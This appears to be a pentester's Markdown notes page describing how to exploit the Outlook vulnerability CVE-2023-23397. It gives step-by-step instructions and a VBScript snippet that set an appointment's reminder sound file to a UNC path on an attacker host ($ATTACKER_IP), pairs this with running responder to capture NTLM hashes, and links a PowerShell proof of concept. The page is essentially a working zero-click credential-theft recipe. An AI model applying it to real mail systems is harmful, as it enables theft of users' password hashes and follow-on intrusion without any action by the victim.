34 lines
1.2 KiB
Markdown
34 lines
1.2 KiB
Markdown
|
# Outlook Exploits
|
||
|
|
|
||
|
|
## CVE-2023-23397
|
||
|
|
|
||
|
|
Create an Appointment with a custom and malicious reminder sound. The sound file download uses __Universal Naming Convention (UNC)__ paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target.
|
||
|
|
|
||
|
|
|
||
|
|
Therefore, __PidLidReminderFileParameter__ have to be altered containing the UNC, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__.
|
||
|
|
Further, __PidLidReminderOverride__ has to be set to __true__.
|
||
|
|
|
||
|
|
### Usage
|
||
|
|
|
||
|
|
`New Appointment` --> set `Reminder` to 0 minutes.
|
||
|
|
|
||
|
|
`Outlook Spy` plugin is needed. Go to `OutlookSpy` tab, press `CurrentItem` and go to `Script`
|
||
|
|
|
||
|
|
Set the following variables:
|
||
|
|
|
||
|
|
```vbscript
|
||
|
|
AppointmentItem.ReminderOverrideDefault = true
|
||
|
|
AppointmentItem.ReminderPlaySound = true
|
||
|
|
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
|
||
|
|
```
|
||
|
|
|
||
|
|
* Set up `responder -I <interface>` to catch the NTLM hash.
|
||
|
|
|
||
|
|
Press `Run` to save the variables. Send the appointment afterwards.
|
||
|
|
|
||
|
|
### Resources
|
||
|
|
|
||
|
|
* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git)
|
||
|
|
|
||
|
|
|